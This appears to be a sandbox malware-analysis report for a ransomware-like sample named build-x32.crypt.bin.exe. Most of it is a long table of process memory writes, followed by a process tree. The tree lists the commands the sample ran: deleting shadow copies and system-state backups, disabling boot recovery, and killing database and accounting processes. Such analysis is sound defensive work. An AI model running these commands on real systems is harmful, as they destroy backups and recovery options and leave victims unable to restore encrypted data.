PID 1200 wrote to memory of 1624	1200	cmd.exe	169
PID 1200 wrote to memory of 1624	1200	cmd.exe	169
PID 1480 wrote to memory of 1744	1480	build-x32.crypt.bin.exe	170
PID 1480 wrote to memory of 1744	1480	build-x32.crypt.bin.exe	170
PID 1480 wrote to memory of 1744	1480	build-x32.crypt.bin.exe	170
PID 1480 wrote to memory of 1744	1480	build-x32.crypt.bin.exe	170
PID 1744 wrote to memory of 1556	1744	cmd.exe	172
PID 1744 wrote to memory of 1556	1744	cmd.exe	172
PID 1744 wrote to memory of 1556	1744	cmd.exe	172
PID 1744 wrote to memory of 1556	1744	cmd.exe	172
PID 1480 wrote to memory of 1968	1480	build-x32.crypt.bin.exe	173
PID 1480 wrote to memory of 1968	1480	build-x32.crypt.bin.exe	173
PID 1480 wrote to memory of 1968	1480	build-x32.crypt.bin.exe	173
PID 1480 wrote to memory of 1968	1480	build-x32.crypt.bin.exe	173
PID 1968 wrote to memory of 1912	1968	cmd.exe	175
PID 1968 wrote to memory of 1912	1968	cmd.exe	175
PID 1968 wrote to memory of 1912	1968	cmd.exe	175
PID 1968 wrote to memory of 1912	1968	cmd.exe	175
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	176
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	176
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	176
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	176
PID 1992 wrote to memory of 1164	1992	cmd.exe	178
PID 1992 wrote to memory of 1164	1992	cmd.exe	178
PID 1992 wrote to memory of 1164	1992	cmd.exe	178
PID 1992 wrote to memory of 1164	1992	cmd.exe	178
PID 1480 wrote to memory of 1180	1480	build-x32.crypt.bin.exe	179
PID 1480 wrote to memory of 1180	1480	build-x32.crypt.bin.exe	179
PID 1480 wrote to memory of 1180	1480	build-x32.crypt.bin.exe	179
PID 1480 wrote to memory of 1180	1480	build-x32.crypt.bin.exe	179
PID 1180 wrote to memory of 1604	1180	cmd.exe	181
PID 1180 wrote to memory of 1604	1180	cmd.exe	181
PID 1180 wrote to memory of 1604	1180	cmd.exe	181
PID 1180 wrote to memory of 1604	1180	cmd.exe	181
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	182
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	182
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	182
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	182
PID 1516 wrote to memory of 740	1516	cmd.exe	184
PID 1516 wrote to memory of 740	1516	cmd.exe	184
PID 1516 wrote to memory of 740	1516	cmd.exe	184
PID 1516 wrote to memory of 740	1516	cmd.exe	184
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	185
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	185
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	185
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	185
PID 1152 wrote to memory of 1056	1152	cmd.exe	187
PID 1152 wrote to memory of 1056	1152	cmd.exe	187
PID 1152 wrote to memory of 1056	1152	cmd.exe	187
PID 1152 wrote to memory of 1056	1152	cmd.exe	187
PID 1480 wrote to memory of 1824	1480	build-x32.crypt.bin.exe	188
PID 1480 wrote to memory of 1824	1480	build-x32.crypt.bin.exe	188
PID 1480 wrote to memory of 1824	1480	build-x32.crypt.bin.exe	188
PID 1480 wrote to memory of 1824	1480	build-x32.crypt.bin.exe	188
PID 1824 wrote to memory of 1856	1824	cmd.exe	190
PID 1824 wrote to memory of 1856	1824	cmd.exe	190
PID 1824 wrote to memory of 1856	1824	cmd.exe	190
PID 1824 wrote to memory of 1856	1824	cmd.exe	190
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	191
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	191
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	191
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	191
PID 1832 wrote to memory of 756	1832	cmd.exe	193
PID 1832 wrote to memory of 756	1832	cmd.exe	193
PID 1832 wrote to memory of 756	1832	cmd.exe	193
PID 1832 wrote to memory of 756	1832	cmd.exe	193
PID 1480 wrote to memory of 1344	1480	build-x32.crypt.bin.exe	194
PID 1480 wrote to memory of 1344	1480	build-x32.crypt.bin.exe	194
PID 1480 wrote to memory of 1344	1480	build-x32.crypt.bin.exe	194
PID 1480 wrote to memory of 1344	1480	build-x32.crypt.bin.exe	194
PID 1344 wrote to memory of 1828	1344	cmd.exe	196
PID 1344 wrote to memory of 1828	1344	cmd.exe	196
PID 1344 wrote to memory of 1828	1344	cmd.exe	196
PID 1344 wrote to memory of 1828	1344	cmd.exe	196
PID 1480 wrote to memory of 328	1480	build-x32.crypt.bin.exe	197
PID 1480 wrote to memory of 328	1480	build-x32.crypt.bin.exe	197
PID 1480 wrote to memory of 328	1480	build-x32.crypt.bin.exe	197
PID 1480 wrote to memory of 328	1480	build-x32.crypt.bin.exe	197
PID 328 wrote to memory of 324	328	cmd.exe	199
PID 328 wrote to memory of 324	328	cmd.exe	199
PID 328 wrote to memory of 324	328	cmd.exe	199
PID 328 wrote to memory of 324	328	cmd.exe	199
PID 1480 wrote to memory of 1972	1480	build-x32.crypt.bin.exe	200
PID 1480 wrote to memory of 1972	1480	build-x32.crypt.bin.exe	200
PID 1480 wrote to memory of 1972	1480	build-x32.crypt.bin.exe	200
PID 1480 wrote to memory of 1972	1480	build-x32.crypt.bin.exe	200
PID 1972 wrote to memory of 1920	1972	cmd.exe	202
PID 1972 wrote to memory of 1920	1972	cmd.exe	202
PID 1972 wrote to memory of 1920	1972	cmd.exe	202
PID 1972 wrote to memory of 1920	1972	cmd.exe	202
PID 1480 wrote to memory of 1996	1480	build-x32.crypt.bin.exe	203
PID 1480 wrote to memory of 1996	1480	build-x32.crypt.bin.exe	203
PID 1480 wrote to memory of 1996	1480	build-x32.crypt.bin.exe	203
PID 1480 wrote to memory of 1996	1480	build-x32.crypt.bin.exe	203
PID 1996 wrote to memory of 2000	1996	cmd.exe	205
PID 1996 wrote to memory of 2000	1996	cmd.exe	205
PID 1996 wrote to memory of 2000	1996	cmd.exe	205
PID 1996 wrote to memory of 2000	1996	cmd.exe	205
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	206
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	206
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	206
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	206
PID 1140 wrote to memory of 1328	1140	cmd.exe	208
PID 1140 wrote to memory of 1328	1140	cmd.exe	208
PID 1140 wrote to memory of 1328	1140	cmd.exe	208
PID 1140 wrote to memory of 1328	1140	cmd.exe	208
PID 1480 wrote to memory of 980	1480	build-x32.crypt.bin.exe	209
PID 1480 wrote to memory of 980	1480	build-x32.crypt.bin.exe	209
PID 1480 wrote to memory of 980	1480	build-x32.crypt.bin.exe	209
PID 1480 wrote to memory of 980	1480	build-x32.crypt.bin.exe	209
PID 980 wrote to memory of 1252	980	cmd.exe	211
PID 980 wrote to memory of 1252	980	cmd.exe	211
PID 980 wrote to memory of 1252	980	cmd.exe	211
PID 980 wrote to memory of 1252	980	cmd.exe	211
PID 1480 wrote to memory of 340	1480	build-x32.crypt.bin.exe	212
PID 1480 wrote to memory of 340	1480	build-x32.crypt.bin.exe	212
PID 1480 wrote to memory of 340	1480	build-x32.crypt.bin.exe	212
PID 1480 wrote to memory of 340	1480	build-x32.crypt.bin.exe	212
PID 340 wrote to memory of 1500	340	cmd.exe	214
PID 340 wrote to memory of 1500	340	cmd.exe	214
PID 340 wrote to memory of 1500	340	cmd.exe	214
PID 340 wrote to memory of 1500	340	cmd.exe	214
PID 1480 wrote to memory of 1872	1480	build-x32.crypt.bin.exe	215
PID 1480 wrote to memory of 1872	1480	build-x32.crypt.bin.exe	215
PID 1480 wrote to memory of 1872	1480	build-x32.crypt.bin.exe	215
PID 1480 wrote to memory of 1872	1480	build-x32.crypt.bin.exe	215
PID 1872 wrote to memory of 780	1872	cmd.exe	217
PID 1872 wrote to memory of 780	1872	cmd.exe	217
PID 1872 wrote to memory of 780	1872	cmd.exe	217
PID 1872 wrote to memory of 780	1872	cmd.exe	217
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	218
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	218
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	218
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	218
PID 1848 wrote to memory of 1108	1848	cmd.exe	220
PID 1848 wrote to memory of 1108	1848	cmd.exe	220
PID 1848 wrote to memory of 1108	1848	cmd.exe	220
PID 1848 wrote to memory of 1108	1848	cmd.exe	220
PID 1480 wrote to memory of 1860	1480	build-x32.crypt.bin.exe	221
PID 1480 wrote to memory of 1860	1480	build-x32.crypt.bin.exe	221
PID 1480 wrote to memory of 1860	1480	build-x32.crypt.bin.exe	221
PID 1480 wrote to memory of 1860	1480	build-x32.crypt.bin.exe	221
PID 1860 wrote to memory of 1840	1860	cmd.exe	223
PID 1860 wrote to memory of 1840	1860	cmd.exe	223
PID 1860 wrote to memory of 1840	1860	cmd.exe	223
PID 1860 wrote to memory of 1840	1860	cmd.exe	223
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	224
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	224
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	224
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	224
PID 1396 wrote to memory of 664	1396	cmd.exe	226
PID 1396 wrote to memory of 664	1396	cmd.exe	226
PID 1396 wrote to memory of 664	1396	cmd.exe	226
PID 1396 wrote to memory of 664	1396	cmd.exe	226
PID 1480 wrote to memory of 2016	1480	build-x32.crypt.bin.exe	227
PID 1480 wrote to memory of 2016	1480	build-x32.crypt.bin.exe	227
PID 1480 wrote to memory of 2016	1480	build-x32.crypt.bin.exe	227
PID 1480 wrote to memory of 2016	1480	build-x32.crypt.bin.exe	227
PID 2016 wrote to memory of 1200	2016	cmd.exe	229
PID 2016 wrote to memory of 1200	2016	cmd.exe	229
PID 2016 wrote to memory of 1200	2016	cmd.exe	229
PID 2016 wrote to memory of 1200	2016	cmd.exe	229
PID 1480 wrote to memory of 2012	1480	build-x32.crypt.bin.exe	230
PID 1480 wrote to memory of 2012	1480	build-x32.crypt.bin.exe	230
PID 1480 wrote to memory of 2012	1480	build-x32.crypt.bin.exe	230
PID 1480 wrote to memory of 2012	1480	build-x32.crypt.bin.exe	230
PID 2012 wrote to memory of 1744	2012	cmd.exe	232
PID 2012 wrote to memory of 1744	2012	cmd.exe	232
PID 2012 wrote to memory of 1744	2012	cmd.exe	232
PID 2012 wrote to memory of 1744	2012	cmd.exe	232
PID 1480 wrote to memory of 1988	1480	build-x32.crypt.bin.exe	233
PID 1480 wrote to memory of 1988	1480	build-x32.crypt.bin.exe	233
PID 1480 wrote to memory of 1988	1480	build-x32.crypt.bin.exe	233
PID 1480 wrote to memory of 1988	1480	build-x32.crypt.bin.exe	233
PID 1988 wrote to memory of 2024	1988	cmd.exe	235
PID 1988 wrote to memory of 2024	1988	cmd.exe	235
PID 1988 wrote to memory of 2024	1988	cmd.exe	235
PID 1988 wrote to memory of 2024	1988	cmd.exe	235
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	236
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	236
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	236
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	236
PID 1984 wrote to memory of 2028	1984	cmd.exe	238
PID 1984 wrote to memory of 2028	1984	cmd.exe	238
PID 1984 wrote to memory of 2028	1984	cmd.exe	238
PID 1984 wrote to memory of 2028	1984	cmd.exe	238
PID 1480 wrote to memory of 728	1480	build-x32.crypt.bin.exe	239
PID 1480 wrote to memory of 728	1480	build-x32.crypt.bin.exe	239
PID 1480 wrote to memory of 728	1480	build-x32.crypt.bin.exe	239
PID 1480 wrote to memory of 728	1480	build-x32.crypt.bin.exe	239
PID 728 wrote to memory of 1608	728	cmd.exe	241
PID 728 wrote to memory of 1608	728	cmd.exe	241
PID 728 wrote to memory of 1608	728	cmd.exe	241
PID 728 wrote to memory of 1608	728	cmd.exe	241
PID 1480 wrote to memory of 1388	1480	build-x32.crypt.bin.exe	242
PID 1480 wrote to memory of 1388	1480	build-x32.crypt.bin.exe	242
PID 1480 wrote to memory of 1388	1480	build-x32.crypt.bin.exe	242
PID 1480 wrote to memory of 1388	1480	build-x32.crypt.bin.exe	242
PID 1388 wrote to memory of 1516	1388	cmd.exe	244
PID 1388 wrote to memory of 1516	1388	cmd.exe	244
PID 1388 wrote to memory of 1516	1388	cmd.exe	244
PID 1388 wrote to memory of 1516	1388	cmd.exe	244
PID 1480 wrote to memory of 860	1480	build-x32.crypt.bin.exe	245
PID 1480 wrote to memory of 860	1480	build-x32.crypt.bin.exe	245
PID 1480 wrote to memory of 860	1480	build-x32.crypt.bin.exe	245
PID 1480 wrote to memory of 860	1480	build-x32.crypt.bin.exe	245
PID 860 wrote to memory of 792	860	cmd.exe	247
PID 860 wrote to memory of 792	860	cmd.exe	247
PID 860 wrote to memory of 792	860	cmd.exe	247
PID 860 wrote to memory of 792	860	cmd.exe	247
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	248
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	248
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	248
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	248
PID 1884 wrote to memory of 508	1884	cmd.exe	250
PID 1884 wrote to memory of 508	1884	cmd.exe	250
PID 1884 wrote to memory of 508	1884	cmd.exe	250
PID 1884 wrote to memory of 508	1884	cmd.exe	250
PID 1480 wrote to memory of 268	1480	build-x32.crypt.bin.exe	251
PID 1480 wrote to memory of 268	1480	build-x32.crypt.bin.exe	251
PID 1480 wrote to memory of 268	1480	build-x32.crypt.bin.exe	251
PID 1480 wrote to memory of 268	1480	build-x32.crypt.bin.exe	251
PID 268 wrote to memory of 1360	268	cmd.exe	253
PID 268 wrote to memory of 1360	268	cmd.exe	253
PID 268 wrote to memory of 1360	268	cmd.exe	253
PID 268 wrote to memory of 1360	268	cmd.exe	253
PID 1480 wrote to memory of 716	1480	build-x32.crypt.bin.exe	254
PID 1480 wrote to memory of 716	1480	build-x32.crypt.bin.exe	254
PID 1480 wrote to memory of 716	1480	build-x32.crypt.bin.exe	254
PID 1480 wrote to memory of 716	1480	build-x32.crypt.bin.exe	254
PID 716 wrote to memory of 1588	716	cmd.exe	256
PID 716 wrote to memory of 1588	716	cmd.exe	256
PID 716 wrote to memory of 1588	716	cmd.exe	256
PID 716 wrote to memory of 1588	716	cmd.exe	256
PID 1480 wrote to memory of 1636	1480	build-x32.crypt.bin.exe	257
PID 1480 wrote to memory of 1636	1480	build-x32.crypt.bin.exe	257
PID 1480 wrote to memory of 1636	1480	build-x32.crypt.bin.exe	257
PID 1480 wrote to memory of 1636	1480	build-x32.crypt.bin.exe	257
PID 1636 wrote to memory of 612	1636	cmd.exe	259
PID 1636 wrote to memory of 612	1636	cmd.exe	259
PID 1636 wrote to memory of 612	1636	cmd.exe	259
PID 1636 wrote to memory of 612	1636	cmd.exe	259
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	260
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	260
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	260
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	260
PID 1620 wrote to memory of 1552	1620	cmd.exe	262
PID 1620 wrote to memory of 1552	1620	cmd.exe	262
PID 1620 wrote to memory of 1552	1620	cmd.exe	262
PID 1620 wrote to memory of 1552	1620	cmd.exe	262
PID 1480 wrote to memory of 1916	1480	build-x32.crypt.bin.exe	263
PID 1480 wrote to memory of 1916	1480	build-x32.crypt.bin.exe	263
PID 1480 wrote to memory of 1916	1480	build-x32.crypt.bin.exe	263
PID 1480 wrote to memory of 1916	1480	build-x32.crypt.bin.exe	263
PID 1916 wrote to memory of 1996	1916	cmd.exe	265
PID 1916 wrote to memory of 1996	1916	cmd.exe	265
PID 1916 wrote to memory of 1996	1916	cmd.exe	265
PID 1916 wrote to memory of 1996	1916	cmd.exe	265
PID 1480 wrote to memory of 1812	1480	build-x32.crypt.bin.exe	266
PID 1480 wrote to memory of 1812	1480	build-x32.crypt.bin.exe	266
PID 1480 wrote to memory of 1812	1480	build-x32.crypt.bin.exe	266
PID 1480 wrote to memory of 1812	1480	build-x32.crypt.bin.exe	266
PID 1812 wrote to memory of 1184	1812	cmd.exe	268
PID 1812 wrote to memory of 1184	1812	cmd.exe	268
PID 1812 wrote to memory of 1184	1812	cmd.exe	268
PID 1812 wrote to memory of 1184	1812	cmd.exe	268
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	269
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	269
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	269
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	269
PID 1412 wrote to memory of 1476	1412	cmd.exe	271
PID 1412 wrote to memory of 1476	1412	cmd.exe	271
PID 1412 wrote to memory of 1476	1412	cmd.exe	271
PID 1412 wrote to memory of 1476	1412	cmd.exe	271
PID 1480 wrote to memory of 1836	1480	build-x32.crypt.bin.exe	272
PID 1480 wrote to memory of 1836	1480	build-x32.crypt.bin.exe	272
PID 1480 wrote to memory of 1836	1480	build-x32.crypt.bin.exe	272
PID 1480 wrote to memory of 1836	1480	build-x32.crypt.bin.exe	272
PID 1836 wrote to memory of 1564	1836	cmd.exe	274
PID 1836 wrote to memory of 1564	1836	cmd.exe	274
PID 1836 wrote to memory of 1564	1836	cmd.exe	274
PID 1836 wrote to memory of 1564	1836	cmd.exe	274
PID 1480 wrote to memory of 572	1480	build-x32.crypt.bin.exe	275
PID 1480 wrote to memory of 572	1480	build-x32.crypt.bin.exe	275
PID 1480 wrote to memory of 572	1480	build-x32.crypt.bin.exe	275
PID 1480 wrote to memory of 572	1480	build-x32.crypt.bin.exe	275
PID 572 wrote to memory of 1872	572	cmd.exe	277
PID 572 wrote to memory of 1872	572	cmd.exe	277
PID 572 wrote to memory of 1872	572	cmd.exe	277
PID 572 wrote to memory of 1872	572	cmd.exe	277
PID 1480 wrote to memory of 816	1480	build-x32.crypt.bin.exe	278
PID 1480 wrote to memory of 816	1480	build-x32.crypt.bin.exe	278
PID 1480 wrote to memory of 816	1480	build-x32.crypt.bin.exe	278
PID 1480 wrote to memory of 816	1480	build-x32.crypt.bin.exe	278
PID 816 wrote to memory of 1324	816	cmd.exe	280
PID 816 wrote to memory of 1324	816	cmd.exe	280
PID 816 wrote to memory of 1324	816	cmd.exe	280
PID 816 wrote to memory of 1324	816	cmd.exe	280
PID 1480 wrote to memory of 1348	1480	build-x32.crypt.bin.exe	281
PID 1480 wrote to memory of 1348	1480	build-x32.crypt.bin.exe	281
PID 1480 wrote to memory of 1348	1480	build-x32.crypt.bin.exe	281
PID 1480 wrote to memory of 1348	1480	build-x32.crypt.bin.exe	281
PID 1348 wrote to memory of 1868	1348	cmd.exe	283
PID 1348 wrote to memory of 1868	1348	cmd.exe	283
PID 1348 wrote to memory of 1868	1348	cmd.exe	283
PID 1348 wrote to memory of 1868	1348	cmd.exe	283
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	284
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	284
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	284
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	284
PID 1644 wrote to memory of 272	1644	cmd.exe	286
PID 1644 wrote to memory of 272	1644	cmd.exe	286
PID 1644 wrote to memory of 272	1644	cmd.exe	286
PID 1644 wrote to memory of 272	1644	cmd.exe	286
PID 1480 wrote to memory of 1956	1480	build-x32.crypt.bin.exe	287
PID 1480 wrote to memory of 1956	1480	build-x32.crypt.bin.exe	287
PID 1480 wrote to memory of 1956	1480	build-x32.crypt.bin.exe	287
PID 1480 wrote to memory of 1956	1480	build-x32.crypt.bin.exe	287
PID 1956 wrote to memory of 1624	1956	cmd.exe	289
PID 1956 wrote to memory of 1624	1956	cmd.exe	289
PID 1956 wrote to memory of 1624	1956	cmd.exe	289
PID 1956 wrote to memory of 1624	1956	cmd.exe	289
PID 1480 wrote to memory of 784	1480	build-x32.crypt.bin.exe	290
PID 1480 wrote to memory of 784	1480	build-x32.crypt.bin.exe	290
PID 1480 wrote to memory of 784	1480	build-x32.crypt.bin.exe	290
PID 1480 wrote to memory of 784	1480	build-x32.crypt.bin.exe	290
PID 784 wrote to memory of 1744	784	cmd.exe	292
PID 784 wrote to memory of 1744	784	cmd.exe	292
PID 784 wrote to memory of 1744	784	cmd.exe	292
PID 784 wrote to memory of 1744	784	cmd.exe	292
PID 1480 wrote to memory of 2000	1480	build-x32.crypt.bin.exe	293
PID 1480 wrote to memory of 2000	1480	build-x32.crypt.bin.exe	293
PID 1480 wrote to memory of 2000	1480	build-x32.crypt.bin.exe	293
PID 1480 wrote to memory of 2000	1480	build-x32.crypt.bin.exe	293
PID 2000 wrote to memory of 2024	2000	cmd.exe	295
PID 2000 wrote to memory of 2024	2000	cmd.exe	295
PID 2000 wrote to memory of 2024	2000	cmd.exe	295
PID 2000 wrote to memory of 2024	2000	cmd.exe	295
PID 1480 wrote to memory of 1328	1480	build-x32.crypt.bin.exe	296
PID 1480 wrote to memory of 1328	1480	build-x32.crypt.bin.exe	296
PID 1480 wrote to memory of 1328	1480	build-x32.crypt.bin.exe	296
PID 1480 wrote to memory of 1328	1480	build-x32.crypt.bin.exe	296
PID 1328 wrote to memory of 2028	1328	cmd.exe	298
PID 1328 wrote to memory of 2028	1328	cmd.exe	298
PID 1328 wrote to memory of 2028	1328	cmd.exe	298
PID 1328 wrote to memory of 2028	1328	cmd.exe	298
PID 1480 wrote to memory of 1252	1480	build-x32.crypt.bin.exe	299
PID 1480 wrote to memory of 1252	1480	build-x32.crypt.bin.exe	299
PID 1480 wrote to memory of 1252	1480	build-x32.crypt.bin.exe	299
PID 1480 wrote to memory of 1252	1480	build-x32.crypt.bin.exe	299
PID 1252 wrote to memory of 1608	1252	cmd.exe	301
PID 1252 wrote to memory of 1608	1252	cmd.exe	301
PID 1252 wrote to memory of 1608	1252	cmd.exe	301
PID 1252 wrote to memory of 1608	1252	cmd.exe	301
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	302
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	302
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	302
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	302
PID 1500 wrote to memory of 1516	1500	cmd.exe	304
PID 1500 wrote to memory of 1516	1500	cmd.exe	304
PID 1500 wrote to memory of 1516	1500	cmd.exe	304
PID 1500 wrote to memory of 1516	1500	cmd.exe	304
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	305
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	305
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	305
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	305
PID 780 wrote to memory of 1740	780	cmd.exe	307
PID 780 wrote to memory of 1740	780	cmd.exe	307
PID 780 wrote to memory of 1740	780	cmd.exe	307
PID 780 wrote to memory of 1740	780	cmd.exe	307
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	308
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	308
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	308
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	308
PID 1108 wrote to memory of 508	1108	cmd.exe	310
PID 1108 wrote to memory of 508	1108	cmd.exe	310
PID 1108 wrote to memory of 508	1108	cmd.exe	310
PID 1108 wrote to memory of 508	1108	cmd.exe	310
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	311
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	311
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	311
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	311
PID 1840 wrote to memory of 1360	1840	cmd.exe	313
PID 1840 wrote to memory of 1360	1840	cmd.exe	313
PID 1840 wrote to memory of 1360	1840	cmd.exe	313
PID 1840 wrote to memory of 1360	1840	cmd.exe	313
PID 1480 wrote to memory of 664	1480	build-x32.crypt.bin.exe	314
PID 1480 wrote to memory of 664	1480	build-x32.crypt.bin.exe	314
PID 1480 wrote to memory of 664	1480	build-x32.crypt.bin.exe	314
PID 1480 wrote to memory of 664	1480	build-x32.crypt.bin.exe	314
PID 664 wrote to memory of 1588	664	cmd.exe	316
PID 664 wrote to memory of 1588	664	cmd.exe	316
PID 664 wrote to memory of 1588	664	cmd.exe	316
PID 664 wrote to memory of 1588	664	cmd.exe	316
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	318
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	318
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	318
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	318
PID 1480 wrote to memory of 2024	1480	build-x32.crypt.bin.exe	325
PID 1480 wrote to memory of 2024	1480	build-x32.crypt.bin.exe	325
PID 1480 wrote to memory of 2024	1480	build-x32.crypt.bin.exe	325
PID 1480 wrote to memory of 2024	1480	build-x32.crypt.bin.exe	325
PID 2024 wrote to memory of 1072	2024	cmd.exe	327
PID 2024 wrote to memory of 1072	2024	cmd.exe	327
PID 2024 wrote to memory of 1072	2024	cmd.exe	327
PID 2024 wrote to memory of 1072	2024	cmd.exe	327

C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:792
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:1776
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  PID:560
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sql*
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msaccess*
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msaccess*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM mssql*
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM mssql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
